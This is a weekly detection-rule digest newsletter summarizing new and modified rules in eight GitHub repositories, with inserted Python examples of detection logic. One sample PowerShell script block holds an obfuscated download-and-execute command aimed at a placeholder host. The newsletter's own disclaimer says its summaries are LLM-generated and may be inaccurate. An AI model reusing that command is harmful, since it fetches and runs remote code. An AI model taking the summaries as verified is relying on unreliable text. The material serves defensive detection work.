Detections Digest #20250428
Detection rule updates from 8 GitHub repositories between April 21 and April 28, 2025, including 17 new rules and updates to 94 existing ones.
This week's update highlights the most significant changes to detection rules from 8 of the 40+ monitored GitHub repositories. Between Apr 21 and Apr 28, 2025, contributors added 17 new rules and updated 94 existing ones.
Stay informed on the latest changes in detection engineering to improve your threat detection coverage and operational efficiency.
Key Insights
Cloud security detection expanded significantly - Rules now target specific AWS IAM temporary session token usage (ASIA*), MFA registration attempts with these tokens, Kali Linux user agents via AWS CLI, suspicious Azure sign-ins via Visual Studio Code, large Google Workspace document downloads, and refined GCP destructive query monitoring (elastic/detection-rules, panther-labs/panther-analysis).
Windows endpoint detection addresses novel evasion and persistence - New rules identify potential NetNTLMv1 downgrade and RemoteMonologue attacks via registry monitoring, tackle advanced PowerShell obfuscation (string reordering, dynamic IEX reconstruction), and detect Office execution via WMI and print monitor registry persistence, alongside broad Splunk query optimizations and Fibratus rule logic corrections (elastic/detection-rules, rabbitstack/fibratus, splunk/security_content).
macOS rule logic underwent substantial refinement - Elastic migrated numerous macOS rules to EQL for improved precision on process activity, persistence, and evasion, while osquery rules saw targeted tuning through refined process/path exclusions and specific condition adjustments (elastic/detection-rules, chainguard-dev/osquery-defense-kit).
Phishing and impersonation rules received targeted updates - Two new IOK rules introduce IOC-based detection for a specific Valorant phishing kit, and the existing Chase and Microsoft brand impersonation rules were refined in their sender display name, email content, and DMARC checks (phish-report/IOK, sublime-security/sublime-rules).
Detection focus sharpens on emerging TTPs and threat intel integration - New rules specifically track Cookie-Bite attacks targeting Chrome extensions via PowerShell, monitor network connections to Proton66 C2 infrastructure, and integrate threat intelligence indicators directly into email event analysis (SlimKQL/Hunting-Queries-Detection-Rules, elastic/detection-rules).
🔔 All new rules in this issue are available for download as a STIX2 bundle JSON file.
Corporate repositories (8)
sublime-security/sublime-rules (✎2)
https://github.com/sublime-security/sublime-rules
✎ Modified rules
The Chase Bank brand impersonation rule was refined in its sender display name logic and in the Chase-specific portions of email content it matches (Brand impersonation: Chase Bank).
The Microsoft brand impersonation rule was updated to correct a DMARC check condition: the rule now compares the domain to 'office365.com', so sender domain verification behaves as intended (Brand impersonation: Microsoft with embedded logo and credential theft language).
phish-report/IOK (+2)
https://github.com/phish-report/IOK
+ New rules
Two new Sigma rules were created to identify phishing activity related to the 'valorant-7plil474' campaign. The first rule detects landing pages by identifying specific JavaScript variable identifiers. The second rule identifies the phishing kit itself, using specific URL patterns and JavaScript variable names. (Valorant Phishing Kit Landing Page 7plil474, Valorant Phishing Kit 7plil474)
panther-labs/panther-analysis (✎3)
https://github.com/panther-labs/panther-analysis
✎ Modified rules
The "AWS Console Login Without MFA" rule changed how it identifies the acting user, replacing 'userIdentity.principalId' with the UDM helper 'event.udm("actor_user")'. Because this identity keys the rule's new-user tracking, the change affects which accounts are treated as new and what is logged, potentially refining detection of new users (AWS Console Login Without MFA).
The "Google Workspace Many Docs Downloaded" rule tracks bulk document download activity on Google Drive, targeting users whose download volume may indicate data exfiltration (Google Workspace Many Docs Downloaded).
The "GCP Destructive Queries" rule improved its title and severity classifications. It now emits specific messages for the different destructive operations, and 'UPDATE' and 'DELETE' operations are classified at 'INFO' severity while the others remain at 'DEFAULT' (GCP Destructive Queries).
elastic/detection-rules (+10, ✎56)
https://github.com/elastic/detection-rules
+ New rules
Two new rules target potential NetNTLMv1 downgrade and RemoteMonologue attacks on Windows. The NetNTLMv1 rule monitors registry changes to 'LmCompatibilityLevel', while the RemoteMonologue rule identifies suspicious COM object registry modifications involving the RunAs value (Potential NetNTLMv1 Downgrade Attack, Potential RemoteMonologue Attack).
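To make the two registry signals concrete, here is an added example (not Elastic's rule code) that classifies registry value-set events the way the paragraph describes. The event field names ('path', 'data', 'process'), the rule labels and the sample events are this example's own assumptions; the thresholds rest on two documented facts: LmCompatibilityLevel values below 3 permit LM/NTLMv1 responses, and RemoteMonologue works by setting a DCOM AppID's RunAs value to "Interactive User".

```python
import re

# Registry value whose lowering re-enables NetNTLMv1 responses.
LSA_LM_COMPAT = r"HKLM\SYSTEM\CurrentControlSet\Control\Lsa\LmCompatibilityLevel"
# LmCompatibilityLevel 0-2 let the client send LM/NTLMv1; 3 and above send NTLMv2
# only. Any write below 3 is therefore a downgrade.
NTLMV2_ONLY_MIN = 3

# RemoteMonologue changes the RunAs value of a DCOM AppID to "Interactive User" so
# the COM server is activated in the logged-on user's session. HKCR\AppID maps to
# HKLM\SOFTWARE\Classes\AppID, so both spellings (and the WOW6432Node view) are
# accepted.
APPID_RUNAS = re.compile(
    r"^(?:HKCR|HKLM\\SOFTWARE\\(?:WOW6432Node\\)?Classes)\\AppID\\\{[0-9a-f-]{36}\}\\RunAs$",
    re.IGNORECASE,
)


def parse_dword(data):
    """Accept an int, a decimal string, or Sysmon-style 'DWORD (0x00000001)'."""
    if isinstance(data, int):
        return data
    m = re.search(r"0x([0-9a-f]+)", str(data), re.IGNORECASE)
    if m:
        return int(m.group(1), 16)
    try:
        return int(str(data).strip())
    except ValueError:
        return None


def classify_registry_event(ev):
    """Return the illustrative rule labels triggered by one registry value-set event.

    ev is a dict with 'path' (full value path), 'data' (value written) and
    'process' (writing image). These field names are an assumption of this example.
    """
    hits = []
    path = ev["path"]
    if path.lower() == LSA_LM_COMPAT.lower():
        level = parse_dword(ev["data"])
        if level is not None and level < NTLMV2_ONLY_MIN:
            hits.append("netntlmv1-downgrade")
    elif APPID_RUNAS.match(path):
        if str(ev["data"]).strip().lower() == "interactive user":
            hits.append("remotemonologue-runas")
    return hits


def scan(events):
    """Run the classifier over a list of events; return (process, label) pairs."""
    return [(ev["process"], hit) for ev in events for hit in classify_registry_event(ev)]


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {"process": "reg.exe", "path": LSA_LM_COMPAT, "data": "DWORD (0x00000001)"},
    {"process": "svchost.exe", "path": LSA_LM_COMPAT, "data": 5},
    {"process": "powershell.exe",
     "path": r"HKLM\SOFTWARE\Classes\AppID\{00000000-0000-0000-0000-000000000001}\RunAs",
     "data": "Interactive User"},
    {"process": "msiexec.exe",
     "path": r"HKLM\SOFTWARE\Classes\AppID\{00000000-0000-0000-0000-000000000002}\RunAs",
     "data": "NT AUTHORITY\\LocalService"},
]

if __name__ == "__main__":
    for process, hit in scan(SAMPLE_EVENTS):
        print(f"{hit}: written by {process}")
```

The second sample (a write of 5) is the kind of event a hardening GPO produces and must not alert; a real rule would additionally exclude Group Policy's own writer and baseline the value, since a fleet that legitimately sits at 2 will page on every refresh.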
Three new PowerShell-focused detections tackle obfuscation and malicious script execution. One aggregates alerts to identify potentially harmful PowerShell scripts, another flags scripts using string reordering for obfuscation, and the last uncovers IEX command obfuscation via string methods (Potential Malicious PowerShell Based on Alert Correlation, Potential PowerShell Obfuscation via String Reordering, Dynamic IEX Reconstruction via Method String Access).
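The "string reordering" the second rule targets is PowerShell's format operator used to scramble a string, for example ("{1}{0}" -f 'EX','I') evaluating to IEX. The following added example (not Elastic's rule logic) finds such expressions in a script block, reconstructs the string, and flags only those whose placeholders are out of order, so plain "{0} {1}" formatting does not alert. The regular expressions, function names and the sample script block are this example's own assumptions.

```python
import re

# A single-quoted or double-quoted PowerShell string literal.
QUOTED = "'[^']*'|\"[^\"]*\""

# A quoted format string made of {n} placeholders and plain text, followed by the
# -f operator and a comma-separated list of quoted literals. Variable arguments
# ($a, $b) are deliberately not matched: they cannot be reconstructed statically.
FORMAT_RE = re.compile(
    r"""(?P<q>["'])(?P<fmt>(?:[^"'{}]|\{\d+\})*)(?P=q)\s*-f\s*"""
    r"(?P<args>(?:" + QUOTED + r")(?:\s*,\s*(?:" + QUOTED + r"))*)",
    re.IGNORECASE,
)
PLACEHOLDER = re.compile(r"\{(\d+)\}")


def deobfuscate(script):
    """Return (matched_text, reconstructed_string, reordered) for every format expression."""
    results = []
    for m in FORMAT_RE.finditer(script):
        fmt = m.group("fmt")
        indices = [int(i) for i in PLACEHOLDER.findall(fmt)]
        if not indices:
            continue
        args = [a or b for a, b in re.findall("'([^']*)'|\"([^\"]*)\"", m.group("args"))]
        if max(indices) >= len(args):
            continue  # malformed expression; PowerShell itself would throw
        reconstructed = PLACEHOLDER.sub(lambda p: args[int(p.group(1))], fmt)
        reordered = indices != sorted(indices)
        results.append((m.group(0), reconstructed, reordered))
    return results


def reordered_strings(script):
    """The strings an analyst cares about: those rebuilt from out-of-order placeholders."""
    return [rec for _, rec, reordered in deobfuscate(script) if reordered]


# Constructed sample script block (not taken from real malware): two reordered
# expressions and one benign, in-order use of -f.
SAMPLE_SCRIPT_BLOCK = (
    "& (\"{1}{0}\" -f 'EX','I') "
    "(New-Object Net.WebClient).(\"{2}{0}{1}\" -f 'wnload','String','Do')('http://example.invalid/a') ; "
    "'{0}-{1}' -f 'a','b'"
)

if __name__ == "__main__":
    for matched, rebuilt, reordered in deobfuscate(SAMPLE_SCRIPT_BLOCK):
        flag = "REORDERED" if reordered else "in order"
        print(f"{flag:>9}: {matched} -> {rebuilt}")
```

Run over Script Block Logging (event ID 4104) text, the reconstructed values feed a second-stage check for tokens such as IEX, DownloadString or FromBase64String; matching on the raw script text would miss them because they never appear contiguously.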
Three new rules cover AWS activity. One monitors sensitive IAM API calls made with temporary session credentials, whose access key IDs start with 'ASIA'; another flags IAM virtual MFA device registration attempts made with such credentials; a third flags AWS CLI requests whose user agent carries a Kali Linux fingerprint, indicating a potential attacker workstation (AWS IAM API Calls via Temporary Session Tokens, AWS IAM Virtual MFA Device Registration Attempt with Session Token, AWS CLI with Kali Linux Fingerprint Identified).
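The three AWS signals share the same CloudTrail fields, so one added example (not Elastic's rule code) shows them side by side over constructed CloudTrail-shaped records. The lists of sensitive and MFA-registration event names, the hit labels and the sample events are assumptions of this example; the two facts it relies on are that STS session credentials have access key IDs beginning with 'ASIA' (long-term IAM user keys begin with 'AKIA'), and that AWS CLI v2 embeds the operating system distribution in its user agent string.

```python
import re

# Assumed, illustrative list of IAM calls worth alerting on when made with a session
# credential. The real rule's list may differ.
SENSITIVE_IAM_EVENTS = {
    "CreateAccessKey", "CreateLoginProfile", "CreateUser", "AttachUserPolicy",
    "PutUserPolicy", "AttachRolePolicy", "UpdateAssumeRolePolicy", "AddUserToGroup",
}
MFA_REGISTRATION_EVENTS = {"CreateVirtualMFADevice", "EnableMFADevice"}

# AWS CLI v2 user agents look like "aws-cli/2.x Python/3.x Linux/<kernel>
# exe/x86_64.<distro>.<release> ..."; on Kali the distro token is "kali".
KALI_UA = re.compile(r"\bkali\b", re.IGNORECASE)


def is_temporary_credential(access_key_id):
    """ASIA-prefixed key IDs are STS session credentials; AKIA are long-term keys."""
    return (access_key_id or "").startswith("ASIA")


def evaluate(event):
    """Return the illustrative labels an event triggers (possibly several)."""
    hits = []
    key = event.get("userIdentity", {}).get("accessKeyId", "")
    source, name = event.get("eventSource"), event.get("eventName")
    ua = event.get("userAgent", "")

    if source == "iam.amazonaws.com" and is_temporary_credential(key):
        if name in SENSITIVE_IAM_EVENTS:
            hits.append("sensitive-iam-call-with-session-token")
        elif name in MFA_REGISTRATION_EVENTS:
            hits.append("mfa-registration-with-session-token")

    # Only AWS CLI traffic is fingerprinted here; SDKs and the console use other agents.
    if ua.startswith("aws-cli/") and KALI_UA.search(ua):
        hits.append("aws-cli-kali-fingerprint")
    return hits


def scan(events):
    """Return (eventName, label) pairs for every hit across a batch of events."""
    return [(ev["eventName"], hit) for ev in events for hit in evaluate(ev)]


# Constructed sample events using documentation IP ranges; not real CloudTrail data.
UBUNTU_CLI = "aws-cli/2.15.30 Python/3.11.8 Linux/6.5.0 exe/x86_64.ubuntu.22 prompt/off command/iam.create-access-key"
KALI_CLI = "aws-cli/2.15.30 Python/3.11.8 Linux/6.6.9-amd64 exe/x86_64.kali.2024 prompt/off command/sts.get-caller-identity"
SAMPLE_EVENTS = [
    {"eventSource": "iam.amazonaws.com", "eventName": "CreateAccessKey",
     "userIdentity": {"type": "AssumedRole", "accessKeyId": "ASIAEXAMPLE000000001"},
     "userAgent": UBUNTU_CLI, "sourceIPAddress": "203.0.113.10"},
    {"eventSource": "iam.amazonaws.com", "eventName": "CreateVirtualMFADevice",
     "userIdentity": {"type": "AssumedRole", "accessKeyId": "ASIAEXAMPLE000000002"},
     "userAgent": "console.amazonaws.com", "sourceIPAddress": "203.0.113.10"},
    {"eventSource": "sts.amazonaws.com", "eventName": "GetCallerIdentity",
     "userIdentity": {"type": "IAMUser", "accessKeyId": "AKIAEXAMPLE000000003"},
     "userAgent": KALI_CLI, "sourceIPAddress": "198.51.100.7"},
    {"eventSource": "iam.amazonaws.com", "eventName": "CreateAccessKey",
     "userIdentity": {"type": "IAMUser", "accessKeyId": "AKIAEXAMPLE000000004"},
     "userAgent": UBUNTU_CLI, "sourceIPAddress": "203.0.113.11"},
]

if __name__ == "__main__":
    for name, hit in scan(SAMPLE_EVENTS):
        print(f"{hit}: {name}")
```

The caveat a practitioner will hit immediately: in accounts that use IAM Identity Center or cross-account roles, every administrator call carries an ASIA key, so the first two signals are prioritisation aids rather than alerts until they are scoped by assumed-role ARN, source IP or session duration. The Kali fingerprint is cheap for an attacker to change; it catches the careless, not the careful.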
A new Azure sign-in monitoring rule targets unusual access via Visual Studio Code. It matches the Visual Studio Code application identifiers together with the 'resourceDisplayName' of the sign-in to flag authentications that may stem from phishing (Suspicious Azure Sign-in via Visual Studio Code).
A rule to identify email threats using threat intelligence has been added. It matches email indicators with event data to spot possible threats (Threat Intel Email Indicator Match).
✎ Modified rules
Windows rules were updated to include explicit checks and improve detection accuracy. The "User Added to Privileged Group in Active Directory" rule was refined by modifying group ID checks and changing the constraint from 'winlog.api' to 'host.os.type' for filtering relevant events. The "Active Directory Group Modification by SYSTEM" and "Windows User Account Creation" rules now explicitly check the operating system type, focusing detection on intended environments to improve precision. (User Added to Privileged Group in Active Directory, Active Directory Group Modification by SYSTEM, Windows User Account Creation)
macOS rules were extensively migrated from KQL (Kuery) to EQL to gain query precision. The migration came with detection logic adjustments across the affected rules: refined logic, broadened conditions, and tighter specificity expressed in EQL syntax (Dumping Account Hashes via Built-In Commands, Keychain CommandLine Interaction via Unsigned or Untrusted Process, SoftwareUpdate Preferences Modification, Shell Execution via Apple Scripting).
Other macOS rules were renamed and their detection logic refined. For instance, the "Suspicious Installer Package Spawns Network Event" rule had its name updated and its logic revised to include additional process arguments, narrowing what it targets. These updates focus on rule specificity and detection accuracy (Suspicious Installer Package Spawns Network Event, Launch Service Creation and Immediate Loading, Potential Admin Group Account Addition).
Rules covering suspicious process activity and privilege escalation on macOS were significantly revised, often moving from a simple path-based match to an EQL query that combines process and parent process conditions. The aim is to limit false positives while sharpening detection of unauthorized activity (Attempt to Install Root Certificate, Potential Kerberos Attack via Bifrost, Shell Execution via Apple Scripting).
Several rules covering macOS persistence and evasion tactics were rewritten in EQL with refined checks on validity, script execution, and file modification (Suspicious Automator Workflows Execution, Emond Rules Creation or Modification, Attempt to Enable the Root Account).
In specific rules, query operators were switched to 'like' or '=' to simplify the logic and widen coverage of activity such as suspicious login items and unauthorized file path modification (Creation of Hidden Login Item via Apple Script, Persistence via Docker Shortcut Modification, Suspicious CronTab Creation or Modification).
splunk/security_content (✎18)
https://github.com/splunk/security_content
✎ Modified rules
Multiple rules were refined to improve performance and accuracy. Changes involved reducing query complexity, optimizing field usage, and refining join operations to better associate process ids with network activities. (DLLHost with no Command Line Arguments with Network, Rundll32 with no Command Line Arguments with Network, SearchProtocolHost with no Command Line with Network, GPUpdate with no Command Line Arguments with Network)
Further rules had their query logic restructured to reduce complexity, with refined joins and regex usage narrowed to the key fields that drive the detection (Java Writing JSP File, Spoolsv Writing a DLL, Detect Outlook exe writing a zip file, Windows Phishing Outlook Drop Dll In FORM Dir, Outbound Network Connection from Java Using Default Ports).
A further set of rules had their search structure simplified, dropping redundant fields and tightening joins so that fields align correctly and detection accuracy improves (Suspicious WAV file in Appdata Folder, Windows Office Product Dropped Cab or Inf File, Windows Defacement Modify Transcodedwallpaper File, Windows Office Product Dropped Uncommon File, Windows HTTP Network Communication From MSIExec, Windows InstallUtil Uninstall Option with Network, Windows InstallUtil Remote Network Connection).
Two more rules were optimized by restructuring their data model usage and simplifying the queries to the key fields, improving performance without raising the false positive rate (Suspicious writes to Windows Recycle Bin, Unknown Process Using The Kerberos Protocol).
chainguard-dev/osquery-defense-kit (✎7)
https://github.com/chainguard-dev/osquery-defense-kit
✎ Modified rules
The osquery rule 'Unexpected Root Process Linking Against libcurl on macOS' now focuses specifically on root processes and excludes 'docker-mac-net-connect' to prevent false positives, refining its detection scope (Unexpected Root Process Linking Against libcurl on macOS).
Multiple osquery rules were adjusted to refine their exceptions and exclusions for accuracy: the 'Unexpected programs communicating over HTTPS (state-based)' rule now excludes processes like gce, k9s, snapd, and removes some redundant exceptions; the '2-hidden-executable' rule now includes additional directories and exceptions such as '/projects', '/git', and adds exclusions to improve accuracy; the 'Unexpected Kernel Extensions on macOS' rule added a wildcard pattern for macfuse.kext directories; the 'Find unexpected executables in /var' rule includes filters for certain postfix paths, reducing irrelevant alerts from operational files (Unexpected programs communicating over HTTPS (state-based), 2-hidden-executable, Unexpected Kernel Extensions on macOS, Find unexpected executables in /var).
The osquery rule 'Unexpected launchd scripts that use the 'program_arguments' field' now excludes a specific developer ID and a pattern for 'State Tool.app' to reduce false positives, while the 'Unexpected programs listening on a TCP port' rule gained additional exceptions such as 'com.docker.backend' to fine-tune detection of unexpected listeners (Unexpected launchd scripts that use the 'program_arguments' field, Unexpected programs listening on a TCP port).
Personal repositories (2)
SlimKQL/Hunting-Queries-Detection-Rules (+3)
https://github.com/SlimKQL/Hunting-Queries-Detection-Rules
+ New rules
A new KQL rule, 'Cookie-Bite Detection', tracks PowerShell activity that loads new Chrome extensions, combining file creation events with process command lines to surface possible session token theft (Cookie-Bite Detection).
A rule mapping ThreatIntelIndicator IOCs to MITRE ATT&CK techniques was introduced, focusing on 'Web Protocols' (T1071.001). It aims to improve tracking of adversary behavior with time and validity filters (Mapping Threat Intelligence to MITRE ATT&CK Using KQL).
A new rule tracks Proton66 activity by monitoring network connections to specified IP ranges linked to malicious operations (Tracking Proton66 Activity with KQL).
rabbitstack/fibratus (+2, ✎8)
https://github.com/rabbitstack/fibratus
+ New rules
Two new fibratus rules have been added. One targets Microsoft Office processes trying to execute binaries via WMI for unauthorized code execution. The other identifies registry modifications for potential print monitor or processor persistence through malicious DLLs, focusing on specific ControlSet registry paths. (Microsoft Office file execution via WMI, Potential port monitor or print processor persistence via registry modification)
✎ Modified rules
Several rules were corrected for exclusion and pattern-matching syntax. Their "not ... imatches" conditions were written in a form that did not apply the intended exclusions of specific items or paths; the fixes restore the intended logic. The affected rules cover file access to the SAM database, process injection via a tainted memory section, thread execution hijacking, process hollowing, and processes spawned from macro-enabled Microsoft Office documents. (File access to SAM database, Potential process injection via tainted memory section, Potential thread execution hijacking, Potential Process Hollowing, Process spawned from macro-enabled Microsoft Office document)
The "Credential discovery via VaultCmd tool" rule was broadened by relaxing its command-line match to the generic 'list' argument, so that the different ways the tool is invoked are captured. The metadata descriptions were also expanded for context. (Credential discovery via VaultCmd tool)
The "Macro execution via script interpreter" rule saw updates in its condition logic to target the image path rather than just the image name, increasing accuracy. The minimum engine version requirement was also updated from 2.2.0 to 2.4.0. (Macro execution via script interpreter)
The "Unsigned DLL injection via remote thread" rule moved from version 1.1.0 to 1.1.1 following the same correction to its "image.path not imatches" syntax, improving detection accuracy. (Unsigned DLL injection via remote thread)
Feedback
Your input helps us improve! If you spot any issues, mistakes, or omissions in this digest issue, or have suggestions for new data sources to include, we'd love to hear from you. Contact us at team@rulecheck.io - we value your feedback and are committed to improving this resource for the detection engineering community.
Disclaimer
The summaries in this brief are generated autonomously by the OpenAI LLM model based on the provided system and user prompts. While every effort is made to consolidate accurate and relevant insights, the model may occasionally misinterpret, misrepresent, or hallucinate information. Readers are strongly advised to verify all key points by consulting the original sources linked in the brief for complete context and accuracy.
Powered by
This digest is made possible through our partnership with BlackStork, combining their content generation technology with our detection engineering expertise to deliver timely, high-quality updates straight to your inbox.
Looking for a customized version of this newsletter? We'd be happy to help — contact us.